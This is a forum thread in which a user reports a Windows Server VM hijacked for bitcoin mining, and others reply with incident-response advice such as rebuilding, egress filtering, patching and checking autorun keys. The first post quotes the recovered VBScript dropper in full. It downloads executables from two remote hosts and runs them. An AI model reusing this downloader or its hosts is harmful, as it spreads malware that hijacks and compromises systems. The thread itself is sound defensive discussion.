jermzz Posted May 4, 2016 Posted May 4, 2016 It all started yesterday when she realized her VM, which is a Windows server 2012 r2 machine her friend hosts for her (hyper-v), was running at max load. The only real thing she hosts on it is her personal website that she sells some stuff on for fun. Anyway, upon further inspection, she saw a suspicious process taking up tons of cpu. Looked like a legit Microsoft service except it was in a tmp directory. So obviously a virus. But why? So looking deeper, a script was found in c:\ a vbs script (insert garbage here).vbs here's what was in it. Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://www.game918.me:2545/host.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) afile = "host.exe" aGet.SaveToFile afile,2 Shell.Run (afile) Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://huya1219.top/svchost.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) afile = "svchost.exe" aGet.SaveToFile afile,2 Shell.Run (afile) It appears it was downloading executables that were scripts and then copying them to run? Not aire what the point of that would be unless they want to be able to update the script via the web. Anyway, it turns out it scheduled a task to run hourly to run itself again. A bit coin mining service. This little bastard spidered everywhere. My question is HOW did this asshat get in? We ran netstat and found a bunch more stuff. A bunch of modified (or maybe added?) dll files in the MySQL server plugins folder. Im assuming it was some MySQL vulnerablity for arbitrary file upload? I'll post a couple pictures of the files infected. We searched for files modified on the infection date (5/1). We ended up wiping the VM and starting another. No telling what else was infected, or maybe a keylogger.... Crap this sucks. We really just want to know what needs to be patched. Hopefully someone can add some insight. http://imageshack.com/a/img924/108/gsFTxn.jpg http://imageshack.com/a/img921/2816/WCHbBN.png http://imageshack.com/a/img924/1098/2TjwUx.png Quote
cooper Posted May 4, 2016 Posted May 4, 2016 I'd say be glad it was just a spot of bitcoin mining. Since the site was used for selling stuff, it could've been considerably worse. Starting with a new VM set up from scratch is the correct approach. Instead of wiping it might've made more sense to quarantine and pluck apart in a controlled environment at your leisure. Now they got in is a great question, and I'd say it depends on a lot of logging to work that one out. Just yesterday an RCE vuln was found in imagemagic... One thing you could do (and I'm not a Windows person, so don't ask me how to do this) is to make an inventory of external websites this VM has a legitimate purpose of accessing and restricting outbound connections to only those services on those servers. I mean, I trust your GF wasn't using this VM as a place from where to do email and other browsing stuff so there really isn't any valid reason for the VM to initiate an outbound connection to anything but those whitelisted server/port combo's. Trigger an alert (which actually ends up with you in a timely fashion) when such attempts somehow do occur. Maybe incorporate a few more sanity checks like that max load thing. Have an automated alert of such situations so you'll be notified promptly when the excrement touches the propeller. Go over all the parts and make sure there isn't maybe a newer version of anything. Can't really get into specifics without you doing so first, but I think you'll manage this just fine. Yeah, this sucks, but it's kinda the cost of doing business/having something on the internet. As I said, it could've been worse and it sounds like you're nicely managing the situation. Quote
i8igmac Posted May 4, 2016 Posted May 4, 2016 as cooper said. Create a new vm and install... But this rootkit stuff is alot of fun trying to sort out. Its been years since I have played around. find all the registry entries related to all scripts and executables.. HKLM /currentversion/run type stuff... There have been few rootkits that had me defeated... just experienced one the other night to fix a friend's Alienware machine. I just ran out of time and set him up for a reinstall... Could be a fun topic and conversation. " how to make a unremovable rootkit" Everyone can post All there working examples. " post all the possible registry entries where a rootkit Might hide..." Quote
kerravon Posted May 4, 2016 Posted May 4, 2016 what VM software are you using, there are some well documented exploits out there for getting into VM's you might need to patch your hypervisor with updates and such. if you just build a new vm and run it as is you are still open to the same attack. So I would look at patching the system first and maybe set up regular snapshots. But thats just my opinion take it for what it is, I run several esx farms and have done for years without problem. regards kerravon Quote
jermzz Posted May 4, 2016 Author Posted May 4, 2016 (edited) The VM has indeed been recreated. I'll have to ask her what VM she uses. I found this, seems to be what she may have had http://m.theinquirer.net/inquirer/news/2109599/worlds-dangerous-botnet-mines-bitcoins edit: so she was running an old version of Wordpress and MySQL. She was asking for it. Now she knows. Edited May 4, 2016 by jermzz Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.